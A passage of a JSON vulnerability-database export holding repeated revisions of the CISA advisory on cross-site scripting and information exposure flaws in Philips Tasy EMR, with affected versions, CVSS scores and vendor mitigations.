"ICSA-18-282-02", "ICSA-18-354-02", "ICSA-18-163-01", "ICSA-15-069-01", "ICSMA-20-170-03", "ICSA-15-071-01", "ICSA-19-290-02", "ICSA-19-190-02", "ICSA-20-161-03", "ICSA-15-323-01", "ICSA-18-317-03", "ICSA-15-062-01", "ICSA-19-227-02", "ICSA-19-309-01", "ICSA-20-105-07", "ICSA-15-069-02", "ICSMA-18-142-01", "ICSA-17-341-01", "ICSA-18-046-04", "ICSMA-19-353-01", "ICSA-20-063-03", "ICSA-17-243-04", "ICSA-20-315-03", "ICSA-17-234-04", "ICSA-17-047-02", "ICSA-12-030-01A", "ICSA-18-032-03", "ICSA-18-254-04", "ICSA-13-213-02", "ICSA-20-044-02", "ICSA-11-168-01A", "ICSMA-17-318-01", "ICSMA-19-120-01", "ICS-VU-313-03", "ICSA-17-192-02", "ICSA-11-294-01", "ICSA-19-213-01", "ICSA-16-131-01", "ICSA-16-040-01", "ICSA-18-095-03", "ICSA-19-162-02", "ICSA-12-228-01A", "ICSA-17-180-01A", "ICSA-18-338-01", "ICSA-16-161-01", "ICSA-16-278-02", "ICSA-13-079-01", "ICSA-18-212-01", "ICSA-18-058-03", "ICSA-15-125-01B", "ICSA-15-090-02", "ICSA-19-304-04", "ICSA-14-198-03G", "ICSA-13-079-02", "ICSA-17-264-04", "ICSA-16-336-05B", "ICSA-11-285-01", "ICSA-19-022-01", "ICSA-13-077-01B", "ICSA-18-240-01", "ICSA2012601", "ICSA-16-166-01", "ICSA-19-178-05", "ICSA2012602", "ICSMA-19-241-01", "ICSA-13-225-02", "ICSA-19-106-03", "ICSA-20-324-03", "ICSA-13-113-01", "ICSA-15-013-03", "ICSA-20-042-10", "ICSA-20-324-02", "ICSA-10-316-01A", "ICSA-21-049-02", "ICSA-17-304-02", "ICSA-17-010-01A", "ICSA-19-134-05", "ICSA-15-237-01", "ICSA-313-01", "ICSA-21-040-06", "ICSA-17-194-03", "ICSA-20-161-02", "ICSA-11-161-01", "ICSA-11-017-01", "ICSA-19-344-05", "ICSA-13-225-01", "ICSA-20-210-02", "ICSA-17-059-01", "ICSA-15-064-04", "ICSA-12-297-02", "ICSA-20-086-01", "ICSA-15-232-01", "ICSA-17-320-01", "ICSA-19-050-01"], "type": "ics"}], "rev": 2}, "score": {"modified": "2020-12-18T03:21:38", "rev": 2, "value": 6.2, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2020-12-18T03:21:38", "differentElements": ["description", "references"], "edition": 2}, {"bulletin": {"id": "ICSMA-19-120-01", "hash": "81291df57e9d2336425d7d80b17a9fb2", "type": "ics", "bulletinFamily": "info", "title": "Philips Tasy EMR (Update A)", "description": "## 1\\. EXECUTIVE SUMMARY\n\n**\\--------- Begin Update A Part 1 of 7 ---------**\n\n * **CVSS v3 4.3**\n * **ATTENTION:** Low skill level to exploit\n\n**\\--------- End Update A Part 1 of 7 ---------**\n\n * **Vendor:** Philips\n * **Equipment: **Tasy EMR\n\n**\\--------- Begin Update A Part 2 of 7 ---------**\n\n * **Vulnerability:** Cross-site Scripting, Information Exposure\n\n**\\--------- End Update A Part 2 of 7 ---------**\n\n## 2\\. UPDATE INFORMATION\n\nThis updated advisory is a follow-up to the original advisory titled ICSMA-19-120-01 Philips Tasy EMR that was published April 30, 2019, on the ICS webpage on us-cert.gov.\n\n## 3\\. RISK EVALUATION\n\n**\\--------- Begin Update A Part 3 of 7 ---------**\n\nSuccessful exploitation of these vulnerabilities could impact or compromise patient confidentiality and system integrity. Philips\u2019 analysis has shown these issues, if fully exploited, may allow an attacker of low skill to provide unexpected input into the application, execute arbitrary code, alter the intended control flow of the system, and access sensitive information.\n\n**\\--------- End Update A Part 3 of 7 ---------**\n\n## 4\\. TECHNICAL DETAILS\n\n### 4.1 AFFECTED PRODUCTS\n\nThe following versions of Tasy EMR, a clinical and administrative workflow-based information system, are affected:\n\n**\\--------- Begin Update A Part 4 of 7 ---------**\n\n * Tasy EMR Versions 3.02.1744 and prior\n * Tasy WebPortal Versions 3.02.1757 and prior\n\n**\\--------- End Update A Part 4 of 7 ---------**\n\n### 4.2 VULNERABILITY OVERVIEW\n\n### 4.2.1 [IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION ('CROSS-SITE SCRIPTING') CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\nThe software incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.\n\n[CVE-2019-6562](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6562>) has been assigned to this vulnerability. A CVSS v3 base score of 4.1 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N>)).\n\n**\\--------- Begin Update A Part 5 of 7 ---------**\n\n#### 4.2.2 [INFORMATION EXPOSURE CWE-200](<https://cwe.mitre.org/data/definitions/200.html>)\n\nThere is an information exposure vulnerability which may allow a remote attacker to access system and configuration information.\n\n[CVE-2019-13557](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13557>) has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N>)).\n\n**\\--------- End Update A Part 5 of 7 ---------**\n\n### 4.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Healthcare and Public Health\n * **COUNTRIES/AREAS DEPLOYED:** Brazil, Mexico\n * **COMPANY HEADQUARTERS LOCATION:** Netherlands\n\n### 4.4 RESEARCHER\n\n**\\--------- Begin Update A Part 6 of 7 ---------**\n\nSecurity researcher Rafael Honorato reported and Unimed de Blumenau Cooperativa de Trabalho M\u00e9dico IT Department each separately reported a vulnerability to Philips.\n\n**\\--------- End Update A Part 6 of 7 ---------**\n\n## 5\\. MITIGATIONS\n\n**\\--------- Begin Update A Part 7 of 7 ---------**\n\nPhilips advises users to update to the most recently released versions of the product, following the Tasy EMR release schedule. Update Tasy EMR, to version 3.03.1745 or higher and update Tasy WebPortal, to version 3.03.1758 or higher.\n\nPhilips also recommends users follow the instructions in the product configuration manual and follow market standard best practices from the application server manufacturer documentation related to security.\n\n**\\--------- End Update A Part 7 of 7 ---------**\n\nUsers should upgrade Service Packs as soon as possible. Hosted solutions will be patched automatically. Users running the application on premise are always alerted via release notes on changes to the system.\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Restrict system access to authorized personnel only and follow a least privilege approach.\n * Apply defense-in-depth strategies.\n * Disable unnecessary accounts and services.\n * Where additional information is needed, refer to existing cybersecurity in medical device guidance issued by the FDA that can be found at the following location:\n\n<https://www.fda.gov/MedicalDevices/DigitalHealth/ucm373213.htm>\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://www.us-cert.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.gov](<https://www.us-cert.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.gov](<https://www.us-cert.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSMA-19-120-01>); we'd welcome your feedback.\n", "published": "2019-11-07T00:00:00", "modified": "2019-11-07T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {}, "href": "https://www.us-cert.gov//ics/advisories/ICSMA-19-120-01", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://cwe.mitre.org/data/definitions/79.html", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plug-information", "https://www.dhs.gov/privacy-policy", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "https://www.us-cert.gov/ics/recommended-practices", "https://www.whitehouse.gov/", "https://www.dhs.gov/plain-writing-dhs", "https://www.oig.dhs.gov/", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSMA-19-120-01", "https://www.dhs.gov/freedom-information-act-foia", "http://twitter.com/icscert", "https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B", "https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "https://www.dhs.gov", "https://www.fda.gov/MedicalDevices/DigitalHealth/ucm373213.htm", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSMA-19-120-01", "https://cwe.mitre.org/data/definitions/200.html", "https://www.usa.gov/", "https://www.dhs.gov/", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSMA-19-120-01", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6562", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13557", "https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSMA-19-120-01", "https://www.us-cert.gov/ics", "https://www.us-cert.gov/ics"], "cvelist": ["CVE-2019-6562", "CVE-2019-13557"], "immutableFields": [], "lastseen": "2021-02-24T09:27:20", "history": [], "viewCount": 55, "enchantments": {"dependencies": {"modified": "2021-02-24T09:27:20", "references": [{"idList": ["CVE-2019-6562", "CVE-2019-13557"], "type": "cve"}, {"idList": ["ICSA-19-339-01", "ICSMA-18-037-01", "ICSA-14-343-01", "ICSMA-17-250-01", "ICSA-12-227-01", "ICSA-20-084-02", "ICSA-18-324-01", "ICSA-19-120-01", "ICSA-20-238-01", "ICSA-15-057-01", "ICSA-12-271-01", "ICSA-17-341-03", "ICSA-13-142-01", "ICSA-15-258-03", "ICSA-20-315-04", "ICSA-20-196-08", "ICSA-12-205-02", "ICSA-19-010-01", "ICSA-20-161-01", "ICSA-18-254-03", "ICSA-16-208-03", "ICSA-19-211-01", "ICSA-20-163-01", "ICSA-20-252-02", "ICSA-16-175-02", "ICSA-13-053-01", "ICSA-19-078-02", "ICSA-14-303-01", "ICSMA-19-353-01", "ICSA-17-192-01", "ICSA-17-047-02", "ICSA-17-054-01", "ICSA-19-274-03", "ICSA-16-357-02", "ICSA-12-131-01", "ICSA-17-019-01A", "ICSA-13-170-01", "ICSA-14-051-02", "ICSMA-19-120-01", "ICSA-20-308-02", "ICSA-18-128-02", "ICSA-16-334-02", "ICSA-15-099-01E", "ICSA-19-260-03", "ICSA-16-131-01", "ICSA-16-343-03", "ICSA-18-095-03", "ICSA-15-169-01", "ICSMA-20-254-01", "ICSA-15-356-01", "ICSA-19-136-02", "ICSA-16-287-04", "ICSA-18-079-02", "ICSA-11-216-01", "ICSA-11-091-01A", "ICSA-17-180-01A", "ICSA-16-075-01", "ICSA-18-130-02", "ICSA-20-196-04", "ICSA-16-026-01", "ICSA-16-033-01", "ICSA-12-102-01", "ICSA-17-285-02", "ICSA-19-043-02", "ICSA-20-014-06", "ICSA-15-274-01", "ICSA-16-152-02", "ICSA-14-051-03B", "ICSA-18-254-02", "ICSA-15-202-03B", "ICSA-16-196-01", "ICSA-10-264-01", "ICSA2012601", "ICSA-16-182-02", "ICSA-16-161-02", "ICSA-20-261-01", "ICSA2012602", "ICSA-21-040-04", "ICSA-20-070-01", "ICSA-17-138-03", "ICSA-13-018-01", "ICSA-18-354-01", "ICSA-15-097-01", "ICSA-12-171-01", "ICSA-19-225-01", "ICSA-20-289-02", "ICSA-15-309-01", "ICSA-313-01", "ICSA-12-305-01", "ICSA-16-145-01", "ICSA-12-102-03", "ICSA-14-269-01A", "ICSA-13-038-01A", "ICSA-17-187-04", "ICSA-13-352-01", "ICSMA-21-007-01", "ICSA-18-352-03", "ICSA-15-160-01", "ICSA-13-016-01", "ICSA-21-021-03"], "type": "ics"}, {"idList": ["SMNTC-108120", "SMNTC-110814"], "type": "symantec"}], "rev": 2}, "score": {"modified": "2021-02-24T09:27:20", "rev": 2, "value": 6.2, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2021-02-24T09:27:20", "differentElements": ["href"], "edition": 3}, {"bulletin": {"id": "ICSMA-19-120-01", "hash": "abc88ae6a48d650a504ac66c44c164b9", "type": "ics", "bulletinFamily": "info", "title": "Philips Tasy EMR (Update A)", "description": "## 1\\. EXECUTIVE SUMMARY\n\n**\\--------- Begin Update A Part 1 of 7 ---------**\n\n * **CVSS v3 4.3**\n * **ATTENTION:** Low skill level to exploit\n\n**\\--------- End Update A Part 1 of 7 ---------**\n\n * **Vendor:** Philips\n * **Equipment: **Tasy EMR\n\n**\\--------- Begin Update A Part 2 of 7 ---------**\n\n * **Vulnerability:** Cross-site Scripting, Information Exposure\n\n**\\--------- End Update A Part 2 of 7 ---------**\n\n## 2\\. UPDATE INFORMATION\n\nThis updated advisory is a follow-up to the original advisory titled ICSMA-19-120-01 Philips Tasy EMR that was published April 30, 2019, on the ICS webpage on us-cert.gov.\n\n## 3\\. RISK EVALUATION\n\n**\\--------- Begin Update A Part 3 of 7 ---------**\n\nSuccessful exploitation of these vulnerabilities could impact or compromise patient confidentiality and system integrity. Philips\u2019 analysis has shown these issues, if fully exploited, may allow an attacker of low skill to provide unexpected input into the application, execute arbitrary code, alter the intended control flow of the system, and access sensitive information.\n\n**\\--------- End Update A Part 3 of 7 ---------**\n\n## 4\\. TECHNICAL DETAILS\n\n### 4.1 AFFECTED PRODUCTS\n\nThe following versions of Tasy EMR, a clinical and administrative workflow-based information system, are affected:\n\n**\\--------- Begin Update A Part 4 of 7 ---------**\n\n * Tasy EMR Versions 3.02.1744 and prior\n * Tasy WebPortal Versions 3.02.1757 and prior\n\n**\\--------- End Update A Part 4 of 7 ---------**\n\n### 4.2 VULNERABILITY OVERVIEW\n\n### 4.2.1 [IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION ('CROSS-SITE SCRIPTING') CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\nThe software incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.\n\n[CVE-2019-6562](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6562>) has been assigned to this vulnerability. A CVSS v3 base score of 4.1 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N>)).\n\n**\\--------- Begin Update A Part 5 of 7 ---------**\n\n#### 4.2.2 [INFORMATION EXPOSURE CWE-200](<https://cwe.mitre.org/data/definitions/200.html>)\n\nThere is an information exposure vulnerability which may allow a remote attacker to access system and configuration information.\n\n[CVE-2019-13557](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13557>) has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N>)).\n\n**\\--------- End Update A Part 5 of 7 ---------**\n\n### 4.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Healthcare and Public Health\n * **COUNTRIES/AREAS DEPLOYED:** Brazil, Mexico\n * **COMPANY HEADQUARTERS LOCATION:** Netherlands\n\n### 4.4 RESEARCHER\n\n**\\--------- Begin Update A Part 6 of 7 ---------**\n\nSecurity researcher Rafael Honorato reported and Unimed de Blumenau Cooperativa de Trabalho M\u00e9dico IT Department each separately reported a vulnerability to Philips.\n\n**\\--------- End Update A Part 6 of 7 ---------**\n\n## 5\\. MITIGATIONS\n\n**\\--------- Begin Update A Part 7 of 7 ---------**\n\nPhilips advises users to update to the most recently released versions of the product, following the Tasy EMR release schedule. Update Tasy EMR, to version 3.03.1745 or higher and update Tasy WebPortal, to version 3.03.1758 or higher.\n\nPhilips also recommends users follow the instructions in the product configuration manual and follow market standard best practices from the application server manufacturer documentation related to security.\n\n**\\--------- End Update A Part 7 of 7 ---------**\n\nUsers should upgrade Service Packs as soon as possible. Hosted solutions will be patched automatically. Users running the application on premise are always alerted via release notes on changes to the system.\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Restrict system access to authorized personnel only and follow a least privilege approach.\n * Apply defense-in-depth strategies.\n * Disable unnecessary accounts and services.\n * Where additional information is needed, refer to existing cybersecurity in medical device guidance issued by the FDA that can be found at the following location:\n\n<https://www.fda.gov/MedicalDevices/DigitalHealth/ucm373213.htm>\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://www.us-cert.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.gov](<https://www.us-cert.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.gov](<https://www.us-cert.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSMA-19-120-01>); we'd welcome your feedback.\n", "published": "2019-11-07T00:00:00", "modified": "2019-11-07T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {}, "href": "https://www.us-cert.gov/ics/advisories/ICSMA-19-120-01", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://cwe.mitre.org/data/definitions/79.html", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plug-information", "https://www.dhs.gov/privacy-policy", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "https://www.us-cert.gov/ics/recommended-practices", "https://www.whitehouse.gov/", "https://www.dhs.gov/plain-writing-dhs", "https://www.oig.dhs.gov/", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSMA-19-120-01", "https://www.dhs.gov/freedom-information-act-foia", "http://twitter.com/icscert", "https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B", "https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "https://www.dhs.gov", "https://www.fda.gov/MedicalDevices/DigitalHealth/ucm373213.htm", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSMA-19-120-01", "https://cwe.mitre.org/data/definitions/200.html", "https://www.usa.gov/", "https://www.dhs.gov/", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSMA-19-120-01", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6562", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13557", "https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSMA-19-120-01", "https://www.us-cert.gov/ics", "https://www.us-cert.gov/ics"], "cvelist": ["CVE-2019-6562", "CVE-2019-13557"], "immutableFields": [], "lastseen": "2021-02-27T19:49:59", "history": [], "viewCount": 56, "enchantments": {"dependencies": {"modified": "2021-02-27T19:49:59", "references": [{"idList": ["CVE-2019-6562", "CVE-2019-13557"], "type": "cve"}, {"idList": ["SMNTC-108120", "SMNTC-110814"], "type": "symantec"}, {"idList": ["ICSMA-20-184-01", "ICSA-21-068-03", "ICSMA-20-296-01", "ICSA-14-205-01", "ICSA-21-103-13", "ICSA-18-282-02", "ICSA-14-023-01", "ICSA-17-115-04", "ICSA-16-103-01", "ICSMA-18-240-01", "ICSA-21-182-05", "ICSA-18-310-02", "ICSA-21-103-07", "ICSMA-18-179-01", "ICSA-14-073-01", "ICSA-18-317-03", "ICSA-20-161-01", "ICSA-13-043-01", "ICSA-21-103-12", "ICSA-20-163-01", "ICSA-13-169-03", "ICSA-16-175-02", "ICSA-17-262-01", "ICSA-20-191-02", "ICSA-18-086-01", "ICSA-13-252-01", "ICSA-17-026-02A", "ICSA-12-083-01", "ICSA-16-287-02", "ICSA-20-084-01", "ICSA-11-273-01", "ICSA-17-047-02", "ICSA-19-274-03", "ICSA-19-304-03", "ICSA-12-179-01", "ICSA-18-254-04", "ICSA-20-042-11", "ICSA-12-249-02", "ICSA-20-072-01", "ICSA-19-213-01", "ICSA-18-347-03", "ICSA-17-045-01", "ICSA-19-085-02", "ICSA-20-142-02", "ICSA-15-356-01", "ICSA-18-079-02", "ICSA-19-262-01", "ICSMA-19-311-01", "ICSA-20-105-04", "ICSA-11-273-03A", "ICSA-13-295-01", "ICSA-15-251-01A", "ICSA-15-153-01", "ICSA-18-200-03", "ICSA-16-182-01", "ICSA-17-122-02", "ICSA-13-084-01", "ICSA-20-014-06", "ICSA-20-224-01", "ICSA-17-136-02", "ICSA-21-194-05", "ICSA-21-152-01", "ICSA-19-318-05", "ICSMA-19-192-01", "ICSMA-18-235-01", "ICSMA-21-152-01", "ICSMA-21-175-01", "ICSA-21-119-02", "ICSA2012601", "ICSA-19-246-01", "ICSA-20-070-06", "ICSA-21-124-01", "ICSA-16-049-01", "ICSA-18-284-03", "ICSA2012602", "ICSA-21-159-07", "ICSA-21-077-02", "ICSA-18-354-01", "ICSA-11-189-01", "ICSA-10-214-01", "ICSA-18-165-01", "ICSA-14-196-01", "ICSA-313-01", "ICSA-15-160-02", "ICSA-19-099-03", "ICSA-10-228-01", "ICSA-18-172-01", "ICSA-19-038-01", "ICSA-20-161-02", "ICSA-16-306-03", "ICSA-11-056-01A", "ICSA-14-259-01A", "ICSA-13-225-01", "ICSA-14-135-01", "ICSA-21-103-05", "ICSA-15-232-01", "ICSA-16-287-05", "ICSA-20-224-05", "ICSA-16-299-01", "ICSA-19-281-03"], "type": "ics"}], "rev": 2}, "score": {"modified": "2021-02-27T19:49:59", "rev": 2, "value": 6.2, "vector": "NONE"}}, "objectVersion": "1.5"}, "lastseen": "2021-02-27T19:49:59", "differentElements": ["cvss2", "cvss3"], "edition": 4}, {"bulletin": {"id": "ICSMA-19-120-01", "hash": "f6bd93f097a5f101f3a7dbe8b718445dc2de54cb66a611ef442afcedfdd33b51", "type": "ics", "bulletinFamily": "info", "title": "Philips Tasy EMR (Update A)", "description": "## 1\\. EXECUTIVE SUMMARY\n\n**\\--------- Begin Update A Part 1 of 7 ---------**\n\n * **CVSS v3 4.3**\n * **ATTENTION:** Low skill level to exploit\n\n**\\--------- End Update A Part 1 of 7 ---------**\n\n * **Vendor:** Philips\n * **Equipment: **Tasy EMR\n\n**\\--------- Begin Update A Part 2 of 7 ---------**\n\n * **Vulnerability:** Cross-site Scripting, Information Exposure\n\n**\\--------- End Update A Part 2 of 7 ---------**\n\n## 2\\. UPDATE INFORMATION\n\nThis updated advisory is a follow-up to the original advisory titled ICSMA-19-120-01 Philips Tasy EMR that was published April 30, 2019, on the ICS webpage on us-cert.gov.\n\n## 3\\. RISK EVALUATION\n\n**\\--------- Begin Update A Part 3 of 7 ---------**\n\nSuccessful exploitation of these vulnerabilities could impact or compromise patient confidentiality and system integrity. Philips\u2019 analysis has shown these issues, if fully exploited, may allow an attacker of low skill to provide unexpected input into the application, execute arbitrary code, alter the intended control flow of the system, and access sensitive information.\n\n**\\--------- End Update A Part 3 of 7 ---------**\n\n## 4\\. TECHNICAL DETAILS\n\n### 4.1 AFFECTED PRODUCTS\n\nThe following versions of Tasy EMR, a clinical and administrative workflow-based information system, are affected:\n\n**\\--------- Begin Update A Part 4 of 7 ---------**\n\n * Tasy EMR Versions 3.02.1744 and prior\n * Tasy WebPortal Versions 3.02.1757 and prior\n\n**\\--------- End Update A Part 4 of 7 ---------**\n\n### 4.2 VULNERABILITY OVERVIEW\n\n### 4.2.1 [IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION ('CROSS-SITE SCRIPTING') CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\nThe software incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.\n\n[CVE-2019-6562](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6562>) has been assigned to this vulnerability. A CVSS v3 base score of 4.1 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N>)).\n\n**\\--------- Begin Update A Part 5 of 7 ---------**\n\n#### 4.2.2 [INFORMATION EXPOSURE CWE-200](<https://cwe.mitre.org/data/definitions/200.html>)\n\nThere is an information exposure vulnerability which may allow a remote attacker to access system and configuration information.\n\n[CVE-2019-13557](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13557>) has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N>)).\n\n**\\--------- End Update A Part 5 of 7 ---------**\n\n### 4.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Healthcare and Public Health\n * **COUNTRIES/AREAS DEPLOYED:** Brazil, Mexico\n * **COMPANY HEADQUARTERS LOCATION:** Netherlands\n\n### 4.4 RESEARCHER\n\n**\\--------- Begin Update A Part 6 of 7 ---------**\n\nSecurity researcher Rafael Honorato reported and Unimed de Blumenau Cooperativa de Trabalho M\u00e9dico IT Department each separately reported a vulnerability to Philips.\n\n**\\--------- End Update A Part 6 of 7 ---------**\n\n## 5\\. MITIGATIONS\n\n**\\--------- Begin Update A Part 7 of 7 ---------**\n\nPhilips advises users to update to the most recently released versions of the product, following the Tasy EMR release schedule. Update Tasy EMR, to version 3.03.1745 or higher and update Tasy WebPortal, to version 3.03.1758 or higher.\n\nPhilips also recommends users follow the instructions in the product configuration manual and follow market standard best practices from the application server manufacturer documentation related to security.\n\n**\\--------- End Update A Part 7 of 7 ---------**\n\nUsers should upgrade Service Packs as soon as possible. Hosted solutions will be patched automatically. Users running the application on premise are always alerted via release notes on changes to the system.\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Restrict system access to authorized personnel only and follow a least privilege approach.\n * Apply defense-in-depth strategies.\n * Disable unnecessary accounts and services.\n * Where additional information is needed, refer to existing cybersecurity in medical device guidance issued by the FDA that can be found at the following location:\n\n<https://www.fda.gov/MedicalDevices/DigitalHealth/ucm373213.htm>\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems 